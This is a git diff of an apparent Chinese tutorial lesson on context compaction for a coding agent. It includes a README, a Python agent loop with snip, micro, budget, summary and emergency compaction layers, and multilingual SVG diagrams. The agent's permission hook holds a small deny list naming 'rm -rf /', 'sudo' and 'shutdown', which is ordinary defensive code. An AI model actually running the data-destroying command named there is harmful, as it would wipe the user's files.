**reactive_compact**:比 compact_history 更激进,从尾部回退,以字节级精度裁剪到 API 可接受的大小,只保留最后 5 条消息 + 摘要。 + +```python +def reactive_compact(messages): + transcript = write_transcript(messages) + summary = summarize_history(messages) + tail = messages[-5:] + return [{"role": "user", + "content": f"[Reactive compact]\n\n{summary}"}, *tail] +``` + +### 合起来跑 + +```python +def agent_loop(messages, state): + while True: + # 三个预处理器(0 API 调用) + messages[:] = snip_compact(messages) # 裁中间 + messages[:] = micro_compact(messages) # 旧结果占位 + messages[:] = tool_result_budget(messages) # 大结果落盘 + + # 还不够?LLM 摘要(1 API 调用) + if estimate_token_count(messages) > THRESHOLD: + messages[:] = compact_history(messages, state) + + try: + response = client.messages.create(...) + except PromptTooLongError: + messages[:] = reactive_compact(messages) # 应急 + continue + # ... 工具执行 ... +``` + +**顺序不能换。** 便宜的先跑,贵的后跑。应急只在报错时才触发。 + +--- + +## 相对 s07 的变更 + +| 组件 | 之前 (s07) | 之后 (s08) | +|------|-----------|-----------| +| 上下文管理 | 无(上下文无限膨胀) | 四层压缩管线 + 应急 | +| 新函数 | — | snip_compact, micro_compact, tool_result_budget, compact_history, reactive_compact | +| 工具 | bash, read_file, write_file, edit_file, glob, todo_write, task, load_skill (8) | bash, read_file, write_file, task, list_skills, load_skill, compact (7) | +| 循环 | LLM 调用 → 工具执行 | 每轮前跑三层预处理器 + 阈值触发 compact_history | +| 设计原则 | — | 便宜的先跑,贵的后跑 | + +--- + +## 试一下 + +```sh +cd learn-claude-code +python s08_context_compact/code.py +``` + +试试这些 prompt: + +1. `Read the file README.md, then read code.py, then read s01_agent_loop/README.md`(连续读多个文件,观察 L2 压缩旧结果) +2. `Read every file in s08_context_compact/`(一次性读大量内容,观察 L3 落盘) +3. 反复对话 20+ 轮,观察是否出现 `[auto compact]` 或 `[reactive compact]` + +观察重点:每次工具执行后,旧 tool_result 是否被压缩?连续对话后 token 超阈值时,是否自动触发了摘要? + +--- + +## 接下来 + +上下文压缩让 Agent 能跑很久不会崩。但每次压缩后,用户之前告诉它的偏好、约束也跟着丢了。能不能让 Agent **有选择地记住**重要的事? + +s09 Memory → 三个子系统:选择记什么、提取关键信息、整理巩固。跨压缩、跨会话。 + +
+深入 CC 源码 + +> 以下基于 CC 源码 `compact.ts`(1705 行)、`autoCompact.ts`(351 行)、`microCompact.ts` 的完整分析。 + +### 执行顺序对照 + +| 维度 | 教学版 | Claude Code | +|------|--------|-------------| +| 执行顺序 | snip → micro → budget → auto | 完全一致(`query.ts:379-543`) | +| snip_compact | 保留头 3 + 尾 47 | 同,CC 仅主线程启用 | +| micro_compact | 文本占位符替换 | API `cache_edits`(不破坏 prompt cache) | +| micro_compact 白名单 | 按位置(最近 3 条) | Read/Bash/Grep/Glob/WebSearch/WebFetch/Edit/Write | +| tool_result_budget | 200KB 字符 | 200,000 字符(~50K token),完全一致 | +| compact_history 阈值 | 字符数估算 | 精确 token:`contextWindow - maxOutputTokens - 13_000` | +| 摘要要求 | 5 类信息 | 9 个部分 + ``/`` 双标签 | +| 压缩 prompt | 简单 prompt | 首尾双重防呆禁止调工具 | +| reactive_compact | 有(简化) | 字节级精度回退群组 | +| 后压缩恢复 | 无 | 自动重新读取最近文件 | +| 熔断器 | 3 次 | 3 次(遥测驱动设计) | + +### 完整常量参考 + +| 常量 | 值 | 源文件 | +|------|-----|--------| +| `AUTOCOMPACT_BUFFER_TOKENS` | 13,000 | `autoCompact.ts:62` | +| `MAX_CONSECUTIVE_AUTOCOMPACT_FAILURES` | 3 | `autoCompact.ts:70` | +| `MAX_OUTPUT_TOKENS_FOR_SUMMARY` | 20,000 | `autoCompact.ts:30` | +| `POST_COMPACT_TOKEN_BUDGET` | 50,000 | `compact.ts:123` | +| `POST_COMPACT_MAX_FILES_TO_RESTORE` | 5 | `compact.ts:122` | +| `POST_COMPACT_MAX_TOKENS_PER_FILE` | 5,000 | `compact.ts:124` | +| 时间 micro_compact 间隔 | 60 分钟 | `timeBasedMCConfig.ts:32` | +| PTL 重试次数 | 3 | `compact.ts:227` | +| 流重试次数 | 2 | `compact.ts:131` | + +### contextCollapse 和 sessionMemoryCompact + +CC 源码中还有两个机制本教学版没有展开: + +- **contextCollapse**:一个独立的上下文管理系统,启用时会完全替代 compact_history。它依赖 CC 的内部编译模块,教学版不展开。 +- **sessionMemoryCompact**:compact_history 之前,CC 会先尝试用已有的 session memory(s09 会讲到)做轻量摘要,不调 LLM。这个机制等学完 s09 之后回头看会更清楚。 + +### 压缩 prompt 长什么样? + +CC 的压缩 prompt 有两个硬性要求: + +1. **绝对禁止调用工具**:开头就是 `CRITICAL: Respond with TEXT ONLY. Do NOT call any tools.`,末尾还会再 REMINDER 一次 +2. **先分析再总结**:模型需要先在 `` 标签里理清思路,然后在 `` 标签里输出正式摘要。analysis 在格式化时被剥离 + +### 教学版的简化是刻意的 + +- micro_compact 用文本占位 → 我们没有 API 层的 `cache_edits` 权限 +- token 用字符数估算 → 精确 tokenizer 不在教学范围内 +- 两个辅助机制不展开 → 属于 10% 的细节 + +**核心设计思想——便宜的先跑,贵的后跑——完整保留。** + +
+ + diff --git a/s08_context_compact/code.py b/s08_context_compact/code.py new file mode 100644 index 000000000..c04ee0e4a --- /dev/null +++ b/s08_context_compact/code.py @@ -0,0 +1,308 @@ +#!/usr/bin/env python3 +""" +s08_context_compact.py - Context Compact + +Four-layer compaction pipeline inserted before LLM calls: + + L1: snip_compact — trim middle messages when count > 50 + L2: micro_compact — replace old tool_results with placeholders + L3: tool_result_budget — persist large results to disk + L4: compact_history — LLM full summary (1 API call) + + Emergency: reactive_compact — when API still returns prompt_too_long + + ┌─────────────────────────────────────────────────────────────┐ + │ messages[] │ + │ ↓ │ + │ L1 snip ─→ L2 micro ─→ L3 budget ─→ [token > threshold?] │ + │ ├─ No → LLM │ + │ └─ Yes → L4 summary │ + │ ↓ │ + │ LLM call │ + │ [prompt_too_long?] │ + │ └─ Yes → reactive │ + └─────────────────────────────────────────────────────────────┘ + +Core principle: cheap first, expensive last. + +Builds on s07 (skill loading). Usage: + + python s08_context_compact/code.py + Needs: pip install anthropic python-dotenv + ANTHROPIC_API_KEY in .env +""" + +import os, subprocess, json, time +from pathlib import Path + +try: + import readline + readline.parse_and_bind('set bind-tty-special-chars off') +except ImportError: + pass + +from anthropic import Anthropic +from dotenv import load_dotenv + +load_dotenv(override=True) +if os.getenv("ANTHROPIC_BASE_URL"): os.environ.pop("ANTHROPIC_AUTH_TOKEN", None) + +WORKDIR = Path.cwd() +SKILLS_DIR = WORKDIR / "skills" +TRANSCRIPT_DIR = WORKDIR / ".transcripts" +TOOL_RESULTS_DIR = WORKDIR / ".task_outputs" / "tool-results" +client = Anthropic(base_url=os.getenv("ANTHROPIC_BASE_URL")) +MODEL = os.environ["MODEL_ID"] + +SYSTEM = f"You are a coding agent at {WORKDIR}. Keep working step by step, and use compact if the conversation gets too long." + +# ═══════════════════════════════════════════════════════════ +# FROM s02-s07 (unchanged): Basic Tools +# ═══════════════════════════════════════════════════════════ + +def safe_path(p: str) -> Path: + path = (WORKDIR / p).resolve() + if not path.is_relative_to(WORKDIR): raise ValueError(f"Path escapes workspace: {p}") + return path + +def run_bash(cmd: str) -> str: + try: + r = subprocess.run(cmd, shell=True, cwd=WORKDIR, capture_output=True, text=True, timeout=120) + out = (r.stdout + r.stderr).strip() + return out[:50000] if out else "(no output)" + except subprocess.TimeoutExpired: return "Error: Timeout (120s)" + +def run_read(path: str, limit: int | None = None) -> str: + try: + lines = safe_path(path).read_text().splitlines() + if limit and limit < len(lines): lines = lines[:limit] + [f"... ({len(lines) - limit} more lines)"] + return "\n".join(lines) + except Exception as e: return f"Error: {e}" + +def run_write(path: str, content: str) -> str: + try: + file_path = safe_path(path); file_path.parent.mkdir(parents=True, exist_ok=True) + file_path.write_text(content); return f"Wrote {len(content)} bytes to {path}" + except Exception as e: return f"Error: {e}" + +def extract_text(content) -> str: + if not isinstance(content, list): return str(content) + return "\n".join(getattr(b, "text", "") for b in content if getattr(b, "type", None) == "text") + +def spawn_subagent(task: str) -> str: + sub_tools = [{"name": "bash", "description": "Run a shell command.", "input_schema": {"type": "object", "properties": {"command": {"type": "string"}}, "required": ["command"]}}, + {"name": "read_file", "description": "Read file contents.", "input_schema": {"type": "object", "properties": {"path": {"type": "string"}}, "required": ["path"]}}] + sub_handlers = {"bash": run_bash, "read_file": run_read} + messages = [{"role": "user", "content": task}] + while True: + response = client.messages.create(model=MODEL, system=SYSTEM, messages=messages, tools=sub_tools, max_tokens=8000) + messages.append({"role": "assistant", "content": response.content}) + if response.stop_reason != "tool_use": break + results = [] + for block in response.content: + if block.type == "tool_use": + h = sub_handlers.get(block.name) + output = h(**block.input) if h else f"Unknown: {block.name}" + results.append({"type": "tool_result", "tool_use_id": block.id, "content": output}) + messages.append({"role": "user", "content": results}) + return extract_text(messages[-1]["content"]) + +def list_skills() -> str: + if not SKILLS_DIR.exists(): return "(no skills)" + skills = [] + for d in sorted(SKILLS_DIR.iterdir()): + if d.is_dir() and (d / "SKILL.md").exists(): + skills.append(f"- **{d.name}**: {(d/'SKILL.md').read_text().split(chr(10))[0].lstrip('#').strip()}") + return "\n".join(skills) if skills else "(no skills)" + +def load_skill(name: str) -> str: + m = SKILLS_DIR / name / "SKILL.md" + return m.read_text() if m.exists() else f"Skill not found: {name}" + + +# ═══════════════════════════════════════════════════════════ +# NEW in s08: Four-Layer Compaction Pipeline +# ═══════════════════════════════════════════════════════════ + +CONTEXT_LIMIT = 50000 +KEEP_RECENT = 3 +PERSIST_THRESHOLD = 30000 + +def estimate_size(msgs): return len(str(msgs)) + + +# L1: snipCompact — trim middle messages +def snip_compact(messages, max_messages=50): + if len(messages) <= max_messages: return messages + keep_head, keep_tail = 3, max_messages - 3 + snipped = len(messages) - keep_head - keep_tail + return messages[:keep_head] + [{"role": "user", "content": f"[snipped {snipped} messages]"}] + messages[-keep_tail:] + + +# L2: microCompact — old result placeholders +def collect_tool_results(messages): + blocks = [] + for mi, msg in enumerate(messages): + if msg.get("role") != "user" or not isinstance(msg.get("content"), list): continue + for bi, block in enumerate(msg["content"]): + if isinstance(block, dict) and block.get("type") == "tool_result": + blocks.append((mi, bi, block)) + return blocks + +def micro_compact(messages): + tool_results = collect_tool_results(messages) + if len(tool_results) <= KEEP_RECENT: return messages + for _, _, block in tool_results[:-KEEP_RECENT]: + if len(block.get("content", "")) > 120: + block["content"] = "[Earlier tool result compacted. Re-run if needed.]" + return messages + + +# L3: toolResultBudget — persist large results to disk +def persist_large_output(tool_use_id, output): + if len(output) <= PERSIST_THRESHOLD: return output + TOOL_RESULTS_DIR.mkdir(parents=True, exist_ok=True) + path = TOOL_RESULTS_DIR / f"{tool_use_id}.txt" + if not path.exists(): path.write_text(output) + return f"\nFull output: {path}\nPreview:\n{output[:2000]}\n" + +def tool_result_budget(messages, max_bytes=200_000): + last = messages[-1] if messages else None + if not last or last.get("role") != "user" or not isinstance(last.get("content"), list): return messages + blocks = [(i, b) for i, b in enumerate(last["content"]) if isinstance(b, dict) and b.get("type") == "tool_result"] + total = sum(len(str(b.get("content", ""))) for _, b in blocks) + if total <= max_bytes: return messages + ranked = sorted(blocks, key=lambda p: len(str(p[1].get("content", ""))), reverse=True) + for _, block in ranked: + if total <= max_bytes: break + content = str(block.get("content", "")) + if len(content) <= PERSIST_THRESHOLD: continue + tid = block.get("tool_use_id", "unknown") + block["content"] = persist_large_output(tid, content) + total = sum(len(str(b.get("content", ""))) for _, b in blocks) + return messages + + +# L4: autoCompact — LLM full summary +def write_transcript(messages): + TRANSCRIPT_DIR.mkdir(parents=True, exist_ok=True) + path = TRANSCRIPT_DIR / f"transcript_{int(time.time())}.jsonl" + with path.open("w") as f: + for msg in messages: f.write(json.dumps(msg, default=str) + "\n") + return path + +def summarize_history(messages): + conversation = json.dumps(messages, default=str)[:80000] + prompt = ("Summarize this coding-agent conversation so work can continue.\n" + "Preserve: 1. current goal, 2. key findings/decisions, 3. files read/changed, " + "4. remaining work, 5. user constraints.\nBe compact but concrete.\n\n" + conversation) + response = client.messages.create(model=MODEL, messages=[{"role": "user", "content": prompt}], max_tokens=2000) + return response.content[0].text.strip() + +def compact_history(messages): + transcript_path = write_transcript(messages) + print(f"[transcript saved: {transcript_path}]") + summary = summarize_history(messages) + return [{"role": "user", "content": f"[Compacted]\n\n{summary}"}] + + +# Emergency: reactiveCompact — on API error +def reactive_compact(messages): + transcript = write_transcript(messages) + summary = summarize_history(messages) + return [{"role": "user", "content": f"[Reactive compact]\n\n{summary}"}, *messages[-5:]] + + +# ═══════════════════════════════════════════════════════════ +# FROM s07 (unchanged): Tool Definitions +# ═══════════════════════════════════════════════════════════ + +TOOLS = [ + {"name": "bash", "description": "Run a shell command.", + "input_schema": {"type": "object", "properties": {"command": {"type": "string"}}, "required": ["command"]}}, + {"name": "read_file", "description": "Read file contents.", + "input_schema": {"type": "object", "properties": {"path": {"type": "string"}, "limit": {"type": "integer"}}, "required": ["path"]}}, + {"name": "write_file", "description": "Write content to a file.", + "input_schema": {"type": "object", "properties": {"path": {"type": "string"}, "content": {"type": "string"}}, "required": ["path", "content"]}}, + {"name": "task", "description": "Launch a subagent.", + "input_schema": {"type": "object", "properties": {"description": {"type": "string"}}, "required": ["description"]}}, + {"name": "list_skills", "description": "List available skills.", "input_schema": {"type": "object", "properties": {}}}, + {"name": "load_skill", "description": "Load skill by name.", + "input_schema": {"type": "object", "properties": {"name": {"type": "string"}}, "required": ["name"]}}, + # s08 change: new compact tool + {"name": "compact", "description": "Summarize earlier conversation to free context space.", + "input_schema": {"type": "object", "properties": {"focus": {"type": "string"}}}}, +] + +TOOL_HANDLERS = {"bash": run_bash, "read_file": run_read, "write_file": run_write, "task": spawn_subagent, + "list_skills": list_skills, "load_skill": load_skill, "compact": lambda **kw: "Compacting..."} + +# FROM s04 (unchanged): Hooks +HOOKS = {"PreToolUse": []} +def trigger_hooks(event, *args): + for cb in HOOKS[event]: + r = cb(*args) + if r is not None: return r + return None +DENY_LIST = ["rm -rf /", "sudo", "shutdown"] +def permission_hook(block): + if block.name == "bash": + for p in DENY_LIST: + if p in block.input.get("command", ""): return "Permission denied" + return None +HOOKS["PreToolUse"].append(permission_hook) + + +# ═══════════════════════════════════════════════════════════ +# agent_loop — s08 core: run compaction pipeline before LLM +# ═══════════════════════════════════════════════════════════ + +def agent_loop(messages: list): + while True: + # s08 change: three preprocessors (0 API calls, cheap first) + messages[:] = snip_compact(messages) + messages[:] = micro_compact(messages) + messages[:] = tool_result_budget(messages) + + # s08 change: tokens still over threshold → LLM summary (1 API call) + if estimate_size(messages) > CONTEXT_LIMIT: + print("[auto compact]") + messages[:] = compact_history(messages) + + try: + response = client.messages.create(model=MODEL, system=SYSTEM, messages=messages, tools=TOOLS, max_tokens=8000) + except Exception as e: + if "prompt_too_long" in str(e).lower() or "too many tokens" in str(e).lower(): + print("[reactive compact]") + messages[:] = reactive_compact(messages) + continue + raise + + messages.append({"role": "assistant", "content": response.content}) + if response.stop_reason != "tool_use": return + + results = [] + for block in response.content: + if block.type != "tool_use": continue + print(f"\033[36m> {block.name}\033[0m") + blocked = trigger_hooks("PreToolUse", block) + if blocked: results.append({"type": "tool_result", "tool_use_id": block.id, "content": str(blocked)}); continue + handler = TOOL_HANDLERS.get(block.name) + output = handler(**block.input) if handler else f"Unknown: {block.name}" + print(str(output)[:200]) + results.append({"type": "tool_result", "tool_use_id": block.id, "content": str(output)}) + messages.append({"role": "user", "content": results}) + + +if __name__ == "__main__": + print("s08: Context Compact") + print("输入问题,回车发送。输入 q 退出。\n") + history = [] + while True: + try: query = input("\033[36ms08 >> \033[0m") + except (EOFError, KeyboardInterrupt): break + if query.strip().lower() in ("q", "exit", ""): break + history.append({"role": "user", "content": query}) + agent_loop(history) + for block in history[-1]["content"]: + if getattr(block, "type", None) == "text": print(block.text) + print() diff --git a/s08_context_compact/images/auto-compact.en.svg b/s08_context_compact/images/auto-compact.en.svg new file mode 100644 index 000000000..7577ac8bd --- /dev/null +++ b/s08_context_compact/images/auto-compact.en.svg @@ -0,0 +1,72 @@ + + + + + + + + + + + + + + L4: autoCompact — LLM Full Summary + + + + Trigger Condition + All three preprocessing layers have run, estimated tokens > contextWindow - maxOutputTokens - 13_000. + Tries sessionMemoryCompact first (lightweight summary from existing memory), only calls LLM if insufficient. + + + + Step 1: Save transcript + Write full conversation to .transcripts/ + JSONL format, one message per line + Filename: transcript_{timestamp}.jsonl + No data lost, just moved out of active area + + + + + Step 2: LLM generates summary + Send conversation history to LLM + Summary must include 9 sections: + request · concepts · files · errors · resolutions + user messages · todos · current state · next steps + Generated only once + + + + + Step 3: Replace message list + All old messages → 1 summary + Model continues from summary + Includes recently_read file list + ⚠ This is an irreversible operation + + + + Before messages + user + assistant + user + assistant + user + ~180 messages, occupying 62K tokens + + + + + After messages + + [Compacted] Summary: goal → create hello.py ... + Recent files: hello.py, README.md ... + ~1 message, occupying 1K tokens + + + + Circuit breaker: + 3 consecutive autocompact failures → stop retrying. Prevents wasting API calls when context is unrecoverable. + diff --git a/s08_context_compact/images/auto-compact.ja.svg b/s08_context_compact/images/auto-compact.ja.svg new file mode 100644 index 000000000..2488bd079 --- /dev/null +++ b/s08_context_compact/images/auto-compact.ja.svg @@ -0,0 +1,72 @@ + + + + + + + + + + + + + + L4: autoCompact — LLM 完全要約 + + + + トリガー条件 + 前 3 層の前処理を全て実行後、推定 token > contextWindow - maxOutputTokens - 13_000。 + まず sessionMemoryCompact を試行(既存のメモリで軽量要約)、不足時のみ LLM を呼び出し。 + + + + ステップ 1:transcript 保存 + 完全な対話を .transcripts/ に書き込み + JSONL 形式、1 行 1 メッセージ + ファイル名:transcript_{timestamp}.jsonl + 情報は失われていない、アクティブ領域から移動のみ + + + + + ステップ 2:LLM 要約生成 + 対話履歴を LLM に送信 + 要約は 9 つのセクションを含む: + リクエスト・概念・ファイル・エラー・解決 + ユーザーメッセージ・TODO・現在・次ステップ + 1 回のみ生成 + + + + + ステップ 3:メッセージリスト置換 + 全旧メッセージ → 1 件の要約に + モデルは要約から作業を継続 + recently_read ファイルリストを付与 + ⚠ これは復元不可能な操作 + + + + 圧縮前 messages + user + assistant + user + assistant + user + ~180 件のメッセージ、62K トークンを占有 + + + + + 圧縮後 messages + + [Compacted] 要約:目標 → hello.py を作成 ... + 最近のファイル:hello.py, README.md ... + ~1 件のメッセージ、1K トークンを占有 + + + + サーキットブレーカー: + autocompact が連続 3 回失敗 → リトライ停止。コンテキストが復元不可能な場合の API 呼び出しの無駄な反復を防止。 + diff --git a/s08_context_compact/images/auto-compact.svg b/s08_context_compact/images/auto-compact.svg new file mode 100644 index 000000000..c7691f956 --- /dev/null +++ b/s08_context_compact/images/auto-compact.svg @@ -0,0 +1,72 @@ + + + + + + + + + + + + + + L4: autoCompact — LLM 全量摘要 + + + + 触发条件 + 前三层预处理全跑完,估算 token > contextWindow - maxOutputTokens - 13_000。 + 先尝试 sessionMemoryCompact(用已有记忆做轻量摘要),不足才调 LLM。 + + + + 步骤 1:保存 transcript + 完整对话写入 .transcripts/ + JSONL 格式,一行一条消息 + 文件名:transcript_{timestamp}.jsonl + 信息没有丢失,只是移出活跃区 + + + + + 步骤 2:LLM 生成摘要 + 把对话历史发给 LLM + 摘要需包含 9 个部分: + 请求·概念·文件·错误·解决 + 用户消息·待办·当前·下一步 + 只生成一次 + + + + + 步骤 3:替换消息列表 + 所有旧消息 → 1 条摘要 + 模型从摘要继续工作 + 附带 recently_read 文件列表 + ⚠ 这是无法恢复的操作 + + + + 压缩前 messages + user + assistant + user + assistant + user + ~180 条消息,占 62K token + + + + + 压缩后 messages + + [Compacted] 摘要:目标 → 创建 hello.py ... + 最近文件:hello.py, README.md ... + ~1 条消息,占 1K token + + + + 熔断器: + 连续 autocompact 失败 3 次 → 停止重试。防止上下文不可恢复时反复浪费 API 调用。 + diff --git a/s08_context_compact/images/compact-overview.en.svg b/s08_context_compact/images/compact-overview.en.svg new file mode 100644 index 000000000..fd6164667 --- /dev/null +++ b/s08_context_compact/images/compact-overview.en.svg @@ -0,0 +1,129 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + Context Compact — Compression Before LLM Call, Three Trigger Modes + + + s07 Preserved + s08 New + + + + messages[] + (s07 preserved) + + + + + + + Compression Pipeline + + + + ① Every Turn · Unconditional · 0 API + + + L1 snip_compact + + + L2 micro_compact + + + L3 tool_result_budget + + + + + + + Over threshold? + + + No → Pass + Straight to LLM + + + Yes↓ + + + + ② Conditional · Token Over Threshold · 1 API + + + L4 compact_history + + + + + + + LLM + stop_reason? + + + + No + + Return Result + + + + Yes + + + + TOOL_HANDLERS + bash · read · write + task · load_skill · ... + + + + ③ Emergency Trigger + API returns prompt_too_long + → reactive_compact → retry + + + + Tool results appended to messages[] → next turn → compress again → LLM + + + + + + s07 Preserved: loop, hooks, skill loading, sub-agents + + + ① Every Turn Auto: L1→L2→L3 run unconditionally before each LLM call, 0 API + + + ② Conditional: after L1-L3, tokens still over threshold → compact_history, 1 API + + + ③ Emergency: API returns prompt_too_long → reactive_compact → retry + + Three modes with increasing cost: 0 API → 1 API → 1 API + more aggressive trimming + diff --git a/s08_context_compact/images/compact-overview.ja.svg b/s08_context_compact/images/compact-overview.ja.svg new file mode 100644 index 000000000..5e86a7440 --- /dev/null +++ b/s08_context_compact/images/compact-overview.ja.svg @@ -0,0 +1,129 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + Context Compact — LLM 呼び出し前に圧縮、3 つのトリガーモード + + + s07 保持 + s08 新規 + + + + messages[] + (s07 保持) + + + + + + + 圧縮パイプライン + + + + ① 毎ターン自動 · 無条件 · 0 API + + + L1 snip_compact + + + L2 micro_compact + + + L3 tool_result_budget + + + + + + + 閾値超過? + + + No → 通過 + 直接 LLM へ + + + Yes↓ + + + + ② 条件 · トークン閾値超過 · 1 API + + + L4 compact_history + + + + + + + LLM + stop_reason? + + + + No + + 結果を返す + + + + Yes + + + + TOOL_HANDLERS + bash · read · write + task · load_skill · ... + + + + ③ 緊急トリガー + API が prompt_too_long を返す + → reactive_compact → リトライ + + + + ツール結果を messages[] に追加 → 次ターン → 再圧縮 → LLM + + + + + + s07 保持:ループ、フック、スキルロード、サブエージェント + + + ① 毎ターン自動:L1→L2→L3 が各 LLM 呼び出し前に無条件実行、0 API + + + ② 条件トリガー:L1-L3 後もトークン超過 → compact_history、1 API + + + ③ 緊急トリガー:API が prompt_too_long を返す → reactive_compact → リトライ + + 3 つのモードはコスト増加:0 API → 1 API → 1 API + より積極的なトリム + diff --git a/s08_context_compact/images/compact-overview.svg b/s08_context_compact/images/compact-overview.svg new file mode 100644 index 000000000..aa48d6087 --- /dev/null +++ b/s08_context_compact/images/compact-overview.svg @@ -0,0 +1,129 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + Context Compact — 压缩插在 LLM 调用前,三种触发模式 + + + s07 保留 + s08 新增 + + + + messages[] + (s07 保留) + + + + + + + 压缩管线 + + + + ① 每轮自动 · 无条件 · 0 API + + + L1 snip_compact + + + L2 micro_compact + + + L3 tool_result_budget + + + + + + + 超阈值? + + + 否 → 通过 + 直接进 LLM + + + 是↓ + + + + ② 条件触发 · token 超阈值 · 1 API + + + L4 compact_history + + + + + + + LLM + stop_reason? + + + + + + 返回结果 + + + + + + + + TOOL_HANDLERS + bash · read · write + task · load_skill · ... + + + + ③ 异常触发 + API 返回 prompt_too_long + → reactive_compact → 重试 + + + + 工具结果追加到 messages[] → 下一轮 → 再次压缩 → LLM + + + + + + s07 保留:循环、钩子、技能加载、子 Agent + + + ① 每轮自动:L1→L2→L3 在每次 LLM 调用前无条件执行,0 API + + + ② 条件触发:L1-L3 跑完 token 仍超阈值 → compact_history,1 API + + + ③ 异常触发:API 返回 prompt_too_long → reactive_compact → 重试 + + 三种模式的代价递增:0 API → 1 API → 1 API + 更激进的裁剪 + diff --git a/s08_context_compact/images/compaction-layers.en.svg b/s08_context_compact/images/compaction-layers.en.svg new file mode 100644 index 000000000..a6ca7e1a7 --- /dev/null +++ b/s08_context_compact/images/compaction-layers.en.svg @@ -0,0 +1,99 @@ + + + + + + + + + + + + + + + + + + + + + + + + + Context Compaction — Pre-processing Pipeline + Auto-compact + Emergency Fallback + + + + Design Principles + Cheap operations first, expensive later + Trim text before dropping messages + Drop messages before calling LLM + + + + Increasing Cost + Text ops → LLM summary → Emergency trim + 0 API · 0 API · 0 API · 1 API · 1 API + + + + Pre-processing Pipeline (runs before every LLM call, 0 API calls) + + + + L1 + snipCompact + messages > 50 → keep first 3 + last 47, trim middle + Drop messages + Trigger: message count exceeds threshold + + + + + + + L2 + microCompact + Old tool_result → clear API cache_edits (keep latest 3) + Clear old results + Trigger: every turn automatically; tutorial uses text placeholder + + + + + + + L3 + toolResultBudget + Single user message tool_result total > 200KB → spill largest to disk + Spill large results + Trigger: auto-check after every tool execution + + + + Auto-compact Decision (triggered when pre-processing is insufficient, 1 API call) + + + + L4 + autoCompact + tokens over threshold → LLM full summary + 1 API call + Threshold: contextWindow - maxOutputTokens - 13,000 · Try sessionMemoryCompact first, then LLM + Circuit breaker: stop retrying after 3 consecutive failures + + + + Emergency Fallback (triggered when API still returns prompt_too_long) + + + + Emrg + reactiveCompact + API returns 413 → byte-level trim, keep last 5 + summary + More aggressive than autoCompact + Trigger: API returns prompt_too_long or 413 error + + diff --git a/s08_context_compact/images/compaction-layers.ja.svg b/s08_context_compact/images/compaction-layers.ja.svg new file mode 100644 index 000000000..82d4aa424 --- /dev/null +++ b/s08_context_compact/images/compaction-layers.ja.svg @@ -0,0 +1,99 @@ + + + + + + + + + + + + + + + + + + + + + + + + + コンテキスト圧縮 — 前処理パイプライン + 自動圧縮 + 緊急フォールバック + + + + 設計原則 + 安価な処理を先に、高価な処理を後に + テキスト修正 → メッセージ削除の順 + メッセージ削除 → LLM 呼び出しの順 + + + + コスト増加 + テキスト操作 → LLM 要約 → 緊急トリム + 0 API · 0 API · 0 API · 1 API · 1 API + + + + 前処理パイプライン(各 LLM 呼び出し前に自動実行、0 API 呼び出し) + + + + L1 + snipCompact + メッセージ > 50 → 先頭 3 + 末尾 47 を保持、中間をトリム + メッセージ削除 + トリガー:メッセージ数が閾値を超過 + + + + + + + L2 + microCompact + 古い tool_result → API cache_edits をクリア(最新 3 件を保持) + 古い結果をクリア + トリガー:毎ターン自動実行、チュートリアル版はテキストプレースホルダーで模擬 + + + + + + + L3 + toolResultBudget + 単一 user メッセージの tool_result 合計 > 200KB → 最大のものをディスクに退避 + 大結果を退避 + トリガー:毎ターンのツール実行後に自動チェック + + + + 自動圧縮判定(前処理で不足時にトリガー、1 API 呼び出し) + + + + L4 + autoCompact + トークンが閾値超過 → LLM 全量要約 + 1 API 呼び出し + 閾値: contextWindow - maxOutputTokens - 13,000 · sessionMemoryCompact を先に試行、不足時のみ LLM 呼び出し + サーキットブレーカー:連続 3 回失敗後にリトライ停止 + + + + 緊急フォールバック(API が引き続き prompt_too_long を返す場合にトリガー) + + + + 緊急 + reactiveCompact + API が 413 を返す → バイトレベルでトリム、最後の 5 件 + 要約を保持 + autoCompact より積極的 + トリガー:API が prompt_too_long または 413 エラーを返す + + diff --git a/s08_context_compact/images/compaction-layers.svg b/s08_context_compact/images/compaction-layers.svg new file mode 100644 index 000000000..ad46b5f10 --- /dev/null +++ b/s08_context_compact/images/compaction-layers.svg @@ -0,0 +1,99 @@ + + + + + + + + + + + + + + + + + + + + + + + + + 上下文压缩 — 预处理管线 + 自动压缩 + 应急兜底 + + + + 设计原则 + 便宜的先跑,贵的后跑 + 能改文本 → 不删整条 + 能删整条 → 不调 LLM + + + + 代价递增 + 文本操作 → LLM 摘要 → 应急裁剪 + 0 API · 0 API · 0 API · 1 API · 1 API + + + + 预处理管线(每轮 LLM 调用前自动执行,0 API 调用) + + + + L1 + snipCompact + 消息 > 50 条 → 保留头 3 + 尾 47,裁中间 + 删除消息 + 触发:消息数超过阈值 + + + + + + + L2 + microCompact + 旧 tool_result → API cache_edits 清除(保留最近 3 条) + 清除旧结果 + 触发:每轮自动,教学版用文本占位符模拟 + + + + + + + L3 + toolResultBudget + 单 user 消息 tool_result 总和 > 200KB → 落盘最大的 + 大结果落盘 + 触发:每轮工具执行后自动检查 + + + + 自动压缩决策(预处理不够时触发,1 API 调用) + + + + L4 + autoCompact + token 超阈值 → LLM 全量摘要 + 1 API 调用 + 阈值: contextWindow - maxOutputTokens - 13,000 · 先尝试 sessionMemoryCompact,不够才调 LLM + 熔断:连续失败 3 次后停止重试 + + + + 应急兜底(API 仍然返回 prompt_too_long 时触发) + + + + 应急 + reactiveCompact + API 返回 413 → 字节级裁剪,保留最后 5 条 + 摘要 + 比 autoCompact 更激进 + 触发:API 返回 prompt_too_long 或 413 错误 + + diff --git a/s08_context_compact/images/layer1-budget.en.svg b/s08_context_compact/images/layer1-budget.en.svg new file mode 100644 index 000000000..1870c59b4 --- /dev/null +++ b/s08_context_compact/images/layer1-budget.en.svg @@ -0,0 +1,50 @@ + + + + + + + + + + + + + + L3: toolResultBudget — Large Result Persistence + + + + Pain Point + Model read 30 files in one turn; total tool_result adds up to 500KB, filling the entire context window + + + Before + + tool_result: (78KB) ... + tool_result: (142KB) ... + tool_result: (290KB) ... + Total 510KB → over budget + + + + + + After + + tool_result: <persisted-output> + Full output: .task_outputs/t1.txt + Preview: (first 2000 chars) ... + Total 18KB → normal + + + + How + 1. Sum the size of all tool_result in the latest turn + 2. Over 200KB → sort by size, persist the largest to .task_outputs/tool-results/ + 3. Keep only <persisted-output> marker + first 2000 chars preview in context + + + + Result: No data lost (full data on disk), context drops from 510KB to ~18KB, 0 API calls + diff --git 